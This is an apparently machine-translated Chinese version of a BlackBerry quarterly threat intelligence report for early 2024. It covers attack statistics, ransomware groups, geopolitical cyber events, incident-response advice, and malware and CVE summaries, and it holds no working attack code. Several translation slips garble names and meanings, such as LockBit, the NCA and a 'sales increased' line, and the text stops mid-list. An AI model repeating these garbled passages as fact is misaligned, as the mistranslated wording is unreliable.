全球威胁情报报告

2024 年 6 月版

报告期:1 月 1 日至 2024 年 3 月 31 日

重要的可操作情报

这份BlackBerry 报告全面回顾了 2024 年 1 月至 3 月期间的全球威胁形势。报告要点包括

我们观察到超过63 万个恶意哈希值,比上一报告期每分钟增加 40% 以上

如需了解更多信息,请参阅本期攻击总数部分

所有攻击中有60%针对关键基础设施。其中, 40%针对金融部门。

关键基础设施 部分.

56% 的 CVE 被评为 7.0 或更高(10 为最严重)。各种形式的恶意软件--尤其是勒索软件和信息窃取软件--都在迅速利用 CVE 作为武器。

如需了解更多信息,请访问常见漏洞和风险暴露部分

新的勒索软件部分: 我们新增了关于全球顶级勒索软件群组和本报告期内最活跃勒索软件的部分。

在 "勒索软件名人录 "部分了解更多信息

BlackBerry®全球威胁情报报告每三个月发布一次。这些频繁的更新使首席信息安全官和其他关键决策者能够随时了解其所在行业和地区的最新网络安全威胁和挑战。

该报告是我们的网络威胁情报 (CTI) 团队、事件响应 (IR) 团队和CylanceMDR部门安全专家的研究、分析和结论的结晶。继续滚动以了解更多信息、下载 pdf阅读执行简报

本期攻击总数

从 2024 年 1 月到 3 月,BlackBerry 网络安全解决方案阻止了超过 3100000 次网络攻击:相当于每天阻止超过 37000 次网络攻击。此外,我们平均每天观察到7500 个针对我们客户群的 独特恶意软件样本
图 1:每分钟遇到的唯一恶意软件哈希值。(2023 年 9 月至 2023 年 12 月共 120 天)。

正如您在本报告中注意到的,总攻击次数并不一定与独特 哈希值(新恶意软件)的数量相关。正如接下来两节中的图 2 至图 6 所示,并非每次攻击都使用了独一无二的恶意软件。这取决于攻击者的动机、攻击的复杂程度和目标(如信息窃取或金融盗窃)。

BlackBerry 网络安全解决方案阻止了超过 3,100,000 次网络攻击:相当于每天阻止超过 37,000 次网络攻击。

按国家分列的袭击事件

停止攻击

下图 2 显示了BlackBerry 网络安全解决方案阻止网络攻击最多的前五个国家。在本报告期内,使用BlackBerry 解决方案的美国组织受到的攻击最多。在亚太地区(APAC),日本、韩国和澳大利亚也遭受了高水平的攻击,因此进入了我们的前五名。在拉丁美洲 (LATAM),洪都拉斯的客户成为主要攻击目标,因此该国在我们的榜单上名列第五。

 

独特的恶意软件

与 2023 年 9 月至 12 月期间相比,在本报告期内,BlackBerry 观察到新型哈希值(独特恶意软件)每分钟增加了 40% 以上(图 1)。图 2 显示了BlackBerry 网络安全解决方案记录到独特恶意软件哈希值数量最多的五个国家,其中美国的数量最多。亚太地区的韩国、日本和澳大利亚保持了上三个月的排名,而巴西则是新上榜的国家。

图 2:按国家排列的被阻止的攻击和遇到的独特恶意软件。
同样,比较图 3a 和图 3b,您会发现被阻止的攻击总数与记录的唯一哈希值数量并不一定相关。资源丰富的威胁行为者可能会开发独特的定制工具和战术,以攻击特定的高价值目标,如特定公司的首席财务官。Deepfakes 越来越多地用于针对特定受害者,例如使用 CEO 的 Deepfake 语音录音来说服该公司的财务经理转账。
图 3a:与上次报告相比,本报告所述期间受影响最大的五个国家停止的攻击排名。
图 3b:本报告所述期间受影响最大国家的唯一哈希值排名与上一份报告相比。

正如我们将在接下来的章节中看到的,其他攻击者可能会利用控制系统中的漏洞或感染网络上的设备,破坏公共事业等实体基础设施

按行业分类的攻击

与上一份报告一样,我们将几个关键行业部门合并为两个总括部分:关键基础设施和商业企业。

根据网络安全和基础设施安全局(CISA)的定义,关键基础设施包括医疗保健、政府、能源、农业、金融和国防等16 个部门

这些部门的数字化程度越来越高,这意味着它们的资产更容易受到网络犯罪分子的攻击。威胁者通过系统错误配置等漏洞和针对员工的社交工程活动,积极利用关键系统。

商业企业包括制造业、资本货物、商业和专业服务业以及零售业。企业一直是网络攻击的诱人目标,而联网设备和云计算的使用日益增多,使得入侵企业系统变得更加容易。攻击者也变得更加老练,他们通常利用社交工程来获取账户凭证和分发恶意软件。

图 4:阻止的特定行业攻击与独特恶意软件的对比。

网络故事集锦:国际银行

墨西哥银行和加密货币平台成为 AllaKore RAT 的攻击目标

今年 1 月,BlackBerry 网络威胁分析师发现了一个针对墨西哥银行和加密货币交易平台的长期金融活动,该活动使用了经过修改的开源远程访问工具 AllaKore RAT。威胁行为者在安装过程中使用模仿墨西哥社会保障局(IMSS)和合法文件的诱饵来分散用户的注意力,从而窃取银行凭证和身份验证信息。这一活动自 2021 年以来一直在进行,主要针对收入超过 1 亿美元的大型墨西哥公司。BlackBerry根据 RAT 有效载荷中使用的墨西哥 Starlink IP 和西班牙语说明,我们的研究结果表明威胁行为者很可能位于拉丁美洲。阅读我们博客上的完整文章,了解更多信息。

阅读全文

关键基础设施威胁

根据我们的内部遥测,在BlackBerry 网络安全解决方案遇到的 特定行业网络攻击中,60% 是针对关键基础设施的。此外,32% 的独特恶意软件散列针对关键基础设施租户。

CylanceENDPOINT和其他BlackBerry 网络安全解决方案阻止了 110 多万次针对金融、医疗保健、政府和公用事业等关键行业部门的攻击。在这 110 万次攻击中,近一半发生在金融行业。此外,政府和公共部门组织遭受的攻击最为多样化,超过 36% 的独特哈希值都针对这一行业。

图 5:已阻止的攻击和针对关键基础设施的独特恶意软件分类。


BlackBerry 遥测技术记录了几个针对全球关键基础设施的流行恶意软件系列。例如,观察到臭名昭著的信息窃取程序 LummaStealer 专门针对拉丁美洲的食品和农业行业以及亚太地区的能源行业。在本报告所述期间观察到的显著威胁包括

  • 8Base 勒索软件:勒索软件操作 | 医疗保健领域
  • 阿玛迪(阿玛迪机器人):多功能僵尸网络 | 政府设施
  • Buhti:勒索软件操作 | 商业地产
  • LummaStealer (LummaC2):基于 C 的信息窃取器 | 食品和农业部门(拉丁美洲和加勒比)以及能源部门(亚太地区)
  • PrivateLoader:下载器系列 | 能源领域
  • Remcos (RemcosRAT):商业级远程访问工具(RAT) | 食品和农业领域
  • Vidar (VidarStealer):Commodity infostealer | Various sectors:
    • 亚太地区国家的能源部门
    • 拉丁美洲和加勒比国家的信息技术部门
    • 北美的金融服务部门
    • 欧洲、中东和非洲(EMEA)的政府设施部门

有关关键基础设施面临的这些威胁的详细信息,请参见附录

图 6:各地区普遍存在的关键基础设施威胁。


关键基础设施面临的外部威胁

外部威胁是指BlackBerry内部遥测记录之外的网络攻击。在上一报告期内,全球威胁范围内发生了多起针对关键基础设施的重大攻击事件。

总部位于美国的爱达荷国家实验室(INL)是美国能源部(DOE)的一个研究机构,2023 年末该实验室的数据泄露事件造成的影响仍在继续。攻击者入侵了该实验室基于云的人力资源管理平台 Oracle HCM,窃取了 45,000 多人的个人数据。随后几周,黑客组织 SiegedSec 声称对此次攻击负责,并在一个在线泄密论坛上发布了部分被盗数据。图 7 提供了本报告所述期间发生的针对关键基础设施的重大威胁的时间表。

图 7:针对关键基础设施的著名外部攻击。

网络故事集锦:基础设施、VPN 和零信任

紧急指令揭示:现在可能是更换 VPN 的时候了

虚拟专用网络(VPN)自 1996 年诞生以来,其核心功能基本保持不变,但最近备受瞩目的安全漏洞事件和政府指令表明,现在可能是重新考虑其使用的时候了。

一个关键问题是 VPN 的 "信任但验证 "模式,这种模式本质上给予网络边界内的用户信任,使其容易受到网络攻击。网络安全和基础设施安全局(CISA)最近发布了针对关键 VPN 漏洞的紧急指令,敦促迅速断开有风险产品的连接,从而凸显了这一风险。请在我们的博客上阅读全文。

阅读全文

商业企业威胁

就像各行各业都受到网络安全威胁的影响一样,单个公司也在与网络攻击作斗争,尤其是当它们在财务、通信、销售、采购和其他业务运营中更加依赖数字基础设施时。从初创企业到跨国集团,都容易受到网络威胁,特别是勒索软件的威胁。

在上一报告期内,BlackBerry 网络安全解决方案阻止了 70 万次针对商业企业行业的 攻击

根据我们的内部遥测,与上一报告期相比,商业企业的销售额增长了

  • 攻击次数增加了 2%。
  • 遇到的唯一哈希值增加了 10%。
图 8:商业企业领域被阻止的攻击和独特的恶意软件。


商业企业面临着通过恶意软件即服务(MaaS)业务销售的信息窃取程序的威胁。这些威胁通常会在受害者的设备上部署额外的恶意软件。它们在规避安全产品和传统防病毒 (AV) 软件的网络军备竞赛中不断发展。BlackBerry 遥测数据中记录的流行恶意软件包括

  • RedLine(红线窃取器): 信息窃取者
  • 烟雾加载器 常用的多功能恶意软件
  • 私人加载器 恶意软件推动者
  • RaccoonStealer: MaaS 信息窃取器
  • LummaStealer (LummaC2):恶意软件信息窃取器

商业企业面临的这些威胁的详细情况见附录

图 9:各地区普遍存在的商业企业威胁。


商业企业面临的外部威胁

勒索软件对各种规模和业务方向的组织都是一种普遍的祸害。最近的勒索软件攻击案例包括

  • VF 公司是 Timberland、The North Face 和 Vans 等知名运动品牌的美国制造商,于 2023 年 12 月成为 ALPHV 勒索软件团伙勒索软件攻击的受害者。攻击者窃取了 3500 多万客户的数据,导致订单执行延误,并在重要的假日季节造成其他干扰。
  • 瑞典连锁超市 Coop Värmland 的繁忙假期被 Cactus 勒索软件团伙的勒索软件攻击打乱
  • 2024 年 2 月,德国知名制造商蒂森克虏伯公司(ThyssenKrupp)的汽车分部遭遇漏洞。该公司后来表示,这次攻击是一次失败的勒索软件攻击
  • 今年 3 月,Stormous 勒索软件组织攻击了比利时 Duvel Moortgat 啤酒厂,该厂生产 20 多种品牌的啤酒,盗取了 88 GB 的数据。

勒索软件名人录

正如上述事件所强调的,勒索软件一直是BlackBerry 全球威胁情报报告中普遍存在的威胁。在本报告中,我们专门介绍了本报告期内活跃的勒索软件群组。

勒索软件是网络犯罪分子和有组织犯罪集团采用的一种通用工具,其目标是全球各行各业的受害者。这些团伙大多有经济动机;他们会迅速调整新的战术和技术,以规避传统的网络安全防御措施,并迅速利用任何新的安全漏洞。

勒索软件正越来越多地以医疗机构为目标,这是一个令人担忧的趋势。 医疗机构是勒索软件集团有利可图的领域,因为医疗记录的数字化程度越来越高,而且一旦这些服务中断就会造成严重后果。在本报告所述期间,全球范围内发生了多起引人注目的攻击事件,这些咄咄逼人的集团可能会危及生命,限制或切断医疗工作者对患者重要个人身份信息 (PII) 数据的访问。 

对医疗保健的攻击会产生严重的连锁反应,使医院、诊所、药店和药房瘫痪;使患者无法获得重要药物;导致救护车改道;扰乱医疗程序的安排。次要影响包括数据泄漏和敏感的患者 PII 在暗网上被出售。因此,我们预测在整个 2024 年,医疗保健将继续成为公开和私下的重点攻击目标。

本报告期主要勒索软件参与者

以下是本报告所述期间全球活跃的著名勒索软件威胁组织:

图 10:2024 年 1 月至 3 月活跃的著名勒索软件组/家族。


猎人国际
猎人国际是一个勒索软件即服务(RaaS)犯罪集团,自 2023 年末开始运作,2024 年初崭露头角。该集团可能是 Hive 勒索软件集团的衍生组织,后者于 2023 年初被执法部门查封。该组织采用双重勒索计划,首先加密受害者的数据以索取赎金,然后通过威胁公开发布被盗数据来索要更多钱财。国际猎人组织目前活跃在全球各地。

8Base
8Base 勒索软件组织最初于 2022 年被发现,2023 年底崛起。这个多产的组织使用各种战术、技术和程序(TTPs),而且非常善于投机取巧。该组织通常会迅速利用新披露的漏洞,并利用包括 Phobos 在内的各种勒索软件。 

洛克比特
LockBit 是一个总部位于俄罗斯的勒索软件组织,专门通过其同名恶意软件提供 RaaS。 LockBit勒索软件于 2020 年被发现,现已成为最具侵略性的勒索软件集团之一。方面包括

  • 定制工具,用于在加密前外泄受害者数据,并通过暗网上的泄漏网站进行托管。
  • 主要针对北美地区的受害者,其次是拉丁美洲和加勒比海地区的受害者。
  • 采用双重勒索策略。

2024 年 2 月,一项国际执法行动 "克罗诺斯行动"破坏了 LockBit 的运营。不过,LockBit 似乎已经反弹,并且仍然是勒索软件领域的主要参与者。

Play
 Play最初出现在 2022 年,是一个多勒索勒索软件集团,它将窃取的数据存放在基于 TOR 的网站上,实现匿名通信,威胁说如果不支付赎金,数据就会泄露。Play 通常以中小型企业 (SMB) 为目标,主要集中在北美地区,但在本报告所述期间也出现在欧洲、中东和非洲地区。该组织主要利用 Cobalt Strike、Empire 和 Mimikatz 等现成工具进行发现和横向移动 TTP。该小组还使用了 Grixba,这是一种定制的侦察和信息窃取工具,在执行勒索软件之前使用。

边联
BianLian 是一款基于 GoLang 的勒索软件,自 2022 年以来一直在野外流行。在本报告所述期间,该相关组织一直很活跃,主要针对北美地区的受害者。与许多勒索软件集团一样, BianLian也会利用最近披露的漏洞,通常以各行各业的小公司为目标。它使用包括 PingCastle、Advance Port Scanner 和 SharpShares 在内的各种现成工具在目标系统上站稳脚跟,然后渗入敏感数据并执行勒索软件。窃取的数据会被用作勒索手段,直到支付赎金为止。

ALPHV
ALPHV 通常被称为 黑猫(BlackCat)或诺贝鲁斯(Noberus),是一个自 2021 年下半年开始出现的 RaaS 操作系统。ALPHV 背后的威胁组织非常复杂,利用 Rust 编程语言针对 Windows、Linux 和基于 VMWare 的操作系统。ALPHV 倾向于以北美受害者为目标。

勒索软件集团......会迅速调整新的战术和技术,以规避传统的网络安全防御措施,并迅速利用任何新的安全漏洞。

网络故事集锦:勒索软件与医疗保健

12 天无收入:勒索软件的余波继续波及医疗保健行业

据美国医院协会(AHA)称,今年 3 月,医疗保健行业遭遇了一次 "史无前例 "的勒索软件攻击,导致医院和药房的运营中断。Change Healthcare 公司每年要处理 150 亿笔医疗保健交易,这次攻击严重影响了临床决策支持和药房运营等患者护理服务。这一破坏导致受影响的医疗机构收入停滞 12 天,并使患者难以获得重要的处方。美国卫生与公众服务部民权办公室目前正在进行调查,最新数据显示,网络威胁显著增加,过去五年中,大型黑客入侵事件增加了 256%。这一事件凸显了医疗保健行业加强网络安全措施的迫切需要。如需详细了解这一紧迫问题,请阅读我们博客上的完整报道。

阅读全文

地缘政治分析与评论

地缘政治冲突日益成为网络攻击的驱动力。数字技术可以成为强大的公益工具,但也可能被国家和非国家行为者滥用。在 2024 年的前三个月,欧洲、北美和亚太地区的立法者成为了有针对性的间谍软件活动的受害者。威胁行为者侵入了多个政府部门的 IT 系统,破坏了军事系统,扰乱了世界各地的关键基础设施。

虽然驱动这些入侵的动机往往复杂而不透明,但最近发生的最重大事件涉及到主要的地缘政治分歧,如俄罗斯入侵乌克兰、以色列和伊朗之间日益加剧的侵略,以及南海和印度洋-太平洋地区持续的紧张局势。

在乌克兰,战争的网络层面仍在继续。与规范网络空间合法行为的国际准则背道而驰的是,对乌克兰发动的攻击仍然没有区分民用和军用基础设施。今年 1 月,俄罗斯特工窃听了基辅居民区的网络摄像头,据称是为了在对该市发动导弹袭击之前收集有关该市防空系统的信息。据报道,攻击者操纵摄像头角度,收集附近重要基础设施的信息,以便更精确地锁定导弹目标。

俄罗斯网络威胁行为者还与针对乌克兰最大移动电话供应商 Kyivstar 的攻击有关,该攻击摧毁了重要的基础设施,切断了乌克兰 2 400 万用户的接入。这次攻击发生在拜登总统与泽连斯基总统在华盛顿特区会晤前几个小时。其中许多议员是欧洲议会安全与国防小组委员会的成员,该小组委员会负责就欧盟对乌克兰的支持提出建议。今年 3 月,俄罗斯攻击者还截获了德国军方官员之间关于向乌克兰提供潜在军事支持的对话,这进一步加强了保护通信免受间谍企图增加的必要性。

随着伊朗和以色列之间军事活动的升级,针对以色列政府网站的网络攻击也随之升级。作为报复,以色列威胁行动者破坏了伊朗全国 70% 的加油站。与此同时,美国对一艘在红海与胡塞叛军共享情报的伊朗军事间谍船发动了网络攻击。

在印度洋-太平洋地区,由中国支持的团体发起的网络攻击和间谍活动继续增加。美国国土安全部网络安全审查委员会发布了一份关于 2023 年夏季微软在线交换事件的重要报告,详细记录了中国支持的攻击者如何从微软窃取源代码。威胁组织 Storm-0558 入侵了美国国务院、美国商务部、美国众议院和英国多个政府部门的员工和官员。据报告称,该威胁组织仅从国务院就下载了约 60,000 封电子邮件。

这并非孤立事件。2024 年 3 月,美国司法部和联邦调查局披露,中国攻击者将目标对准了英国、欧盟、美国和加拿大的多个议会间中国问题联盟成员。

如前所述,针对关键基础设施的攻击已经上升,尤其是在金融和医疗保健领域。2024 年头三个月,法国一家医疗保险公司发生大规模数据泄露事件,导致敏感个人信息外泄。在加拿大,金融交易和报告分析中心(FINTRAC)在一次网络事件后关闭了其系统。对此,加拿大政府拨款 2 700 万加元,用于加强金融交易和报告分析中心的网络复原力,并建立数据安全保障措施。

面对日益增多的网络间谍和网络攻击企图,世界各国政府正在投资加强网络安全。加拿大最近宣布对其网络防御系统的投资达到历史最高水平,英国将其国防开支提高到国内生产总值的 2.5%。网络安全仍然是政府和私营部门面临的最大风险之一,只要地缘政治紧张局势继续加剧,这一趋势就可能持续下去。

事件响应观察

事件响应(IR)是一种管理网络攻击和网络安全事件的企业级方法。事件响应的目标是迅速控制并最大限度地减少漏洞造成的损失,同时缩短恢复时间并降低成本。每个组织都需要一个 IR 计划以及内部或第三方 IR 服务。 BlackBerry® Cybersecurity Services- 包括网络事件响应、数据泄露响应、业务电子邮件泄露响应、勒索软件响应和数字取证,可提供快速事件响应计划,帮助减轻任何网络攻击的影响,并确保数字恢复遵循最佳实践。
图 11:BlackBerry IR 参与情况明细。


BlackBerry 事件应对小组的意见

本文概述了BlackBerry 团队所应对的投资者关系活动类型,以及企业可以采取哪些安全措施来防止此类漏洞。

  • 网络入侵: 最初的感染载体是面向互联网的易受攻击系统,如网络服务器或虚拟专用网 (VPN) 设备。在某些情况下,入侵会导致在目标环境中部署勒索软件,并导致数据外泄。
    • 预防:及时对所有暴露在互联网上的系统进行安全更新。(MITRE - 外部远程服务,T1133)。
  • 内部人员不当行为: 现任和/或前任员工未经授权访问公司资源。  
    • 预防:在所有系统上实施强大的身份验证安全控制。实施正式的公司员工离职程序。(MITRE - 有效账户:云账户,T1078.004)。
  • 勒索软件 在所应对的所有事件中,10% 是基于勒索软件的。
    • 预防:及时为电子邮件、VPN 和网络服务器等面向互联网的服务打补丁。这可以防止威胁行为者通过易受攻击的设备或系统进入企业网络后,访问并进一步实现目标,如部署勒索软件。(MITRE - 外部远程服务,T1133)。
    • 预防:确保组织拥有两份以两种不同媒体格式存储的所有关键数据的副本,这些副本均来自原始数据源,其中至少有一份副本不在现场。

网络安全事件的检测、控制和恢复需要快速检测和响应,以限制损失。企业必须制定记录完备的事件响应计划,并配备训练有素的人员和资源,以便在出现潜在漏洞的第一时间立即采取行动。这将确保安全团队能够尽早发现问题,迅速遏制和消除威胁,并减轻对企业和品牌声誉的影响、经济损失和法律风险。

威胁行为者和工具

威胁行动者

2024 年头三个月,数十个威胁组织发起了网络攻击。我们在此重点介绍了影响最大的攻击。

锁定位

LockBit是一个与俄罗斯有关联的网络犯罪集团。该组织的操作人员兢兢业业地维护和增强他们的同名勒索软件,一旦成功入侵,他们就会监督谈判并精心策划其部署。LockBit 勒索软件采用双重勒索策略,不仅会加密本地数据以限制受害者的访问,还会外泄敏感信息,并威胁说除非支付赎金,否则就会公开曝光这些信息。

今年 2 月,国家禁毒局、联邦调查局和欧洲刑警组织通过一项名为 "克罗诺斯行动 "的全球协调努力,在全球范围内开展了一项名为 "克罗诺斯行动 "的行动。克洛诺斯行动行动",与 10 个国家的执法机构合作,控制了 LockBit 集团的基础设施和泄密网站,从其服务器中收集信息,实施逮捕和制裁。

然而,不到一周后,该勒索软件组织重新集结并恢复了攻击,采用了更新的加密器和赎金说明,在执法中断后将受害者引向新的服务器。

LockBit声称对包括 Capital Health 医院网络在内的各种网络攻击负责。在这两起事件中,他们威胁说,除非迅速支付赎金,否则就会公布机密数据。

雷希达

Rhysida 是一个相对较新的 RaaS 集团,首次被发现是在 2023 年 5 月底。尽管出现时间相对较短,但该组织很快就将自己打造成了一个可行的勒索软件威胁。它的第一次高调攻击以智利军队为目标,标志着针对拉美政府机构的勒索软件攻击开始上升。
Rhysida 组织还攻击了游艇零售商MarineMax。Rhysida 组织从他们的环境中流出了少量数据,包括客户和员工信息,其中包括可用于身份盗窃的 PII。这些被盗数据目前正在暗网上以 15 BTC 的价格出售,截至发稿时约合 1,013,556 美元。此外,Rhysida 还在其暗网泄漏网站上发布了据称显示 MarineMax 财务文件的截图,以及员工驾照和护照的图片。

APT29

APT29 又名 Cozy Bear、Midnight Blizzard 或 NOBELIUM,是俄罗斯对外情报局 (SVR) 的一个威胁组织。APT29以攻击政府、政治和研究组织以及关键基础设施而闻名。

CISA 最近警告说,APT29 已将目标扩大到更多行业和地方政府。该威胁组织以使用各种定制恶意软件而著称,最近还利用被入侵的服务账户或被盗的身份验证令牌攻击云服务。

在本报告所述期间,观察到 APT29 通过密码喷射攻击访问微软测试租户账户,然后创建恶意 OAuth 应用程序访问企业电子邮件账户。此外,他们还利用 2024 年 1 月首次观察到的后门 WINELOADER瞄准德国政党

Akira

Akira勒索软件首次出现在 2023 年初,已被观察到以各行各业的组织为目标。通过使用配置错误或易受攻击的 VPN 服务、面向公众的 RDP、鱼叉式网络钓鱼或被泄露的凭证访问网络,它们试图创建域账户或查找用于权限升级或在网络内横向移动的凭证。

据了解,Akira 使用的工具包括:

  • AdFind 用于查询 Active Directory。
  • 请 Mimikatz 和 LaZagne 提供访问凭证。
  • Ngrok,用于在防火墙或其他安全措施后以隧道方式进入网络。
  • 用于远程访问的 AnyDesk。
  • 高级 IP 扫描仪,用于定位网络上的设备。

威胁行为者使用的主要工具

米米卡兹

Mimikatz因其能够从 Windows 系统的本地安全授权子系统服务 (LSASS) 进程中提取敏感凭证而闻名。 
该程序是用户登录后的凭证存放处,因此成为道德渗透测试人员和恶意行为者的主要攻击目标。Mimikatz 是评估 Windows 网络稳健性的常用工具。合法的渗透测试人员可以使用 Mimikatz 发现关键漏洞,而恶意的威胁行为者则可以使用它在网络内升级权限或横向穿越。LockBit 和 Phobos 等威胁组织利用其功能实施复杂的网络攻击。

钴罢工

Cobalt Strike 是一个对手模拟框架,可在网络环境中复制威胁行为体的持续存在。该工具有两个关键组件:一个代理(Beacon)和一个服务器(Team Server)。团队服务器作为互联网上的长期 C2 服务器,与部署在被入侵机器上的 Beacon 有效载荷保持持续通信。
虽然 Cobalt Strike 主要被渗透测试人员和红队用来评估网络的安全状况,但它也被威胁行为者利用。2020 年底,Cobalt Strike 4.0 的代码在网上泄露,导致各种恶意对手迅速将其武器化。Cobalt Strike 的双重性质凸显了保持警惕和采取强有力的网络安全措施的重要性,以降低与滥用该技术相关的风险,保护网络免受潜在利用。

Ngrok

Ngrok是一个将内部系统接入互联网的平台。它以隧道方式接入防火墙后的网络或设备。在建立互联网可见端点后,进入该端点的流量会通过传输层安全(TLS)隧道传送到内部网络中相应的 Ngrok 代理。这样就可以对系统进行快速的临时测试或远程管理。
然而,这种功能也使其成为对攻击者有吸引力的工具,为指挥控制(C2)和渗透提供了一个安全通道。过去,ALPHV、 LazarusDaixin Team 等威胁组织都曾使用过它。

ConnectWise

ConnectWise ScreenConnect 是一款远程桌面管理工具,广泛用于技术支持、管理服务提供商 (MSP) 和其他专业人员验证机器。 
威胁行为者可滥用 ScreenConnect 渗透到高价值端点并利用权限。ConnectWise 最近解决了两个重大安全问题(CVE-2024-1709 和 CVE-2024-1708),这两个问题有可能使匿名攻击者利用身份验证绕过漏洞,在公开暴露的实例上创建管理员账户。  

按平台划分的普遍威胁:视窗

雷姆科斯

远程访问木马

Remcos 是 Remote Control and Surveillance(远程控制和监视)的简称,是一种用于远程访问受害者设备的应用程序。

特斯拉特工

信息窃取者

Agent Tesla 是一种基于 .NET 的木马程序,经常被当作 MaaS 出售,主要用于收集凭证。

红线

信息窃取者

RedLine 恶意软件利用各种应用程序和服务非法窃取受害者的数据,如信用卡信息、密码和 cookie。

RisePro

信息窃取者

虽然我们在上一份报告中发现了 RisePro 的更新变种,但在本报告所述期间,我们发现该信息窃取程序在 GitHub 存储库中作为 "破解软件 "虚假发布。

烟雾装载机

后门

SmokeLoader 是一种模块化恶意软件,用于下载其他有效载荷和窃取信息。它最初于 2011 年被发现,但至今仍是一个活跃的威胁。

Prometei

加密货币矿工/机器人网络

Prometei 是一个多级跨平台加密货币僵尸网络,主要以 Monero 钱币为目标。它可以调整有效载荷,以 Linux 或 Windows 平台为目标。人们发现,Prometei 与 Mimikatz 一起被用于向尽可能多的终端传播。

布赫蒂

勒索软件

Buhti 是一种勒索软件,它利用其他恶意软件(如 LockBit 或 Babuk)的现有变种来攻击 Linux 和 Windows 系统。

按平台划分的普遍威胁:Linux

XMRig

加密货币矿工

在本报告所述期间,XMRig 继续大行其道。该矿工以 Monero 为目标,同时使威胁行为者能够在受害者不知情的情况下使用其系统挖掘加密货币。

NoaBot/Mirai

分布式拒绝服务(DDoS)

NoaBot 是一种略微复杂的 Mirai 变种。与 Mirai 相比,它拥有更先进的混淆技术,并使用 SSH 而不是 Telnet 进行传播。它还使用 uClibc 而不是 GCC 进行编译,从而增加了检测难度。

XorDDoS

DDoS

XorDDoS 是一种木马恶意软件,经常出现在我们的遥测数据中,它以运行 Linux 的面向互联网的设备为目标,通过 C2 指令协调受感染的僵尸网络。它使用 XOR 加密技术控制执行和通信数据的访问,因此得名。

酸倒

雨刷

虽然在我们的遥测中没有发现,但新版本的数据清除器 AcidPour 已经出现在野外。最新版本的恶意软件专门针对 Linux x86 设备设计,用于清除路由器和调制解调器上的文件。

按平台划分的普遍威胁:MacOS

锈门

后门

RustDoor 是一款基于 Rust 的后门恶意软件,主要通过伪装成合法程序的更新进行传播。该恶意软件以包含Mach-o文件的FAT二进制文件形式传播。

原子窃取器

信息窃取者

原子窃取程序(AMOS)依然猖獗,并在野外发现了一个新版本。最新版本的窃取程序植入了一个 Python 脚本,以帮助用户不被发现。AMOS 以密码、浏览器 cookie、自动填充数据、加密钱包和 Mac 钥匙串数据为目标。

帝国转移

信息窃取者

月锁实验室于 2024 年 2 月发现的一种信息窃取程序。当它检测到自己在虚拟环境中运行时,就会 "自毁"。这有助于恶意软件不被发现,并增加防御者分析的难度。Empire Transfer 以密码、浏览器 cookie 和加密钱包为目标,采用与 Atomic Stealer (AMOS) 类似的策略。

按平台划分的普遍威胁:安卓

间谍笔记

信息窃取者/RAT

SpyNote 利用 Android 辅助功能服务捕获用户数据,并将捕获的数据发送到 C2 服务器。

阿纳察/塔博特

信息窃取者

主要通过 Google Play 商店以木马应用程序的形式传播。初次感染木马应用程序后,Anatsa 会从 C2 服务器下载其他恶意文件到受害者的设备上。

Vultur

信息窃取者/RAT

Vultur 于 2021 年首次被发现,通过木马应用程序和 "smishing"(短信钓鱼)社交工程技术进行传播。除数据外泄外,威胁行为者还可以更改文件系统、修改执行权限,并使用安卓可访问性服务控制受感染的设备。

科珀/奥克托

信息窃取者/RAT

Exobot 系列的变种。它被包装成 MaaS 产品,功能包括键盘记录、短信监控、屏幕控制、远程访问和 C2 操作。

常见漏洞和风险

通用漏洞和暴露(CVE)为识别、标准化和公布已知安全漏洞和暴露提供了一个框架。如前所述,网络犯罪分子越来越多地利用 CVEs 来入侵系统和窃取数据。在本报告期内,在 Ivanti、ConnectWise、Fortra 和 Jenkins 产品中发现的新漏洞为坏人瞄准受害者提供了新的途径。此外,最近几个月的 XZ 后门事件也表明了开源项目中可能存在的供应链攻击风险,XZ Utils 是一种数据压缩实用程序,几乎在所有 Linux 安装中都能使用,该后门被故意植入其中。

从 1 月到 3 月,美国国家标准与技术研究院(NIST)报告了近 8,900 个新的 CVE 。基础分由精心计算的指标组成,可用来计算 0 到 10 分的严重性得分。主要的 CVE 基础分是 "7",占总分的 26%。与上一报告期相比,该 CVE 分数增加了 3%。三月份是今年迄今为止新发现 CVE 最多的月份,新发现的 CVE 接近 3,350 个。CVE趋势表引用了NIST国家漏洞数据库中列出的具体漏洞。

图 12:CVE 严重性分类。

趋势 CVE

XZ Utils 后门

CVE-2024-3094(10 严重)
未授权访问

该恶意代码被嵌入到XZ Utils 5.6.0 和 5.6.1 版本中。该后门操纵了 sshd,可让未经认证的攻击者在未经授权的情况下访问受影响的 Linux 发行版。
 

Ivanti 零日漏洞

CVE-2024-21887(9.1 严重);CVE-2023-46805(8.2 高);CVE-2024-21888(8.8 高);CVE-2024-21893(8.2 高)
任意代码执行

今年年初,在 Ivanti Connect Secure (9.x, 22.x) 和 Ivanti Policy Secure (9.x, 22.x) 产品中发现了身份验证绕过和命令注入漏洞。如果威胁行为者同时使用这两种产品,就可以制作恶意请求并在系统上执行任意命令。

今年 1 月,Ivanti 还警告了另外两个影响产品的漏洞:CVE-2024-21888(权限升级漏洞)和 CVE-2024-21893(服务器端请求伪造漏洞)。国家行为者已经利用这些零日漏洞部署了定制的恶意软件。
 

Windows 智能屏幕绕过

CVE-2024-21412(8.1 高版本)
安全绕过

这是一种互联网快捷方式文件安全功能绕过,会影响 Microsoft Windows 互联网快捷方式文件。它需要用户交互才能绕过安全检查。在初始交互时,它会导致一系列执行,最终将受害者引向恶意脚本。一个威胁组织利用这个零日漏洞部署了 DarkMe RAT。

Windows 内核提升漏洞

CVE-2024-21338(7.8 高)
权限提升

利用该漏洞,攻击者可获得系统权限。Lazarus Group(一个朝鲜威胁组织)利用在 Windows AppLocker 驱动程序 (appid.sys) 中发现的这一零日漏洞获得了内核级访问权限。

Fortra 的 GoAnywhere MFT 漏洞利用

CVE-2024-0204(9.8 严重)
身份验证绕过

今年 1 月,Fortra 发布了一条安全公告,分享了影响 GoAnywhere MFT 产品的关键旁路。该漏洞出现在 Fortra 7.4.1 之前的 GoAnywhere MFT 中。利用该漏洞,未经授权的用户可通过管理门户创建管理员用户。

Jenkins 任意文件读取漏洞

CVE-2024-23897(9.7 临界)
远程代码执行

Jenkins 2.441 及更早版本(LTS 2.426.2)包含一个通过内置命令行界面在 Jenkins 控制器文件系统上发现的漏洞。该漏洞是在 args4j 库中发现的,该库的一个功能是将参数中文件路径后的"@"字符替换为文件内容。

ConnectWise ScreenConnect 23.9.7 漏洞

CVE-2024-1709(10 严重);CVE-2024-1708(8.4 高)
远程代码执行

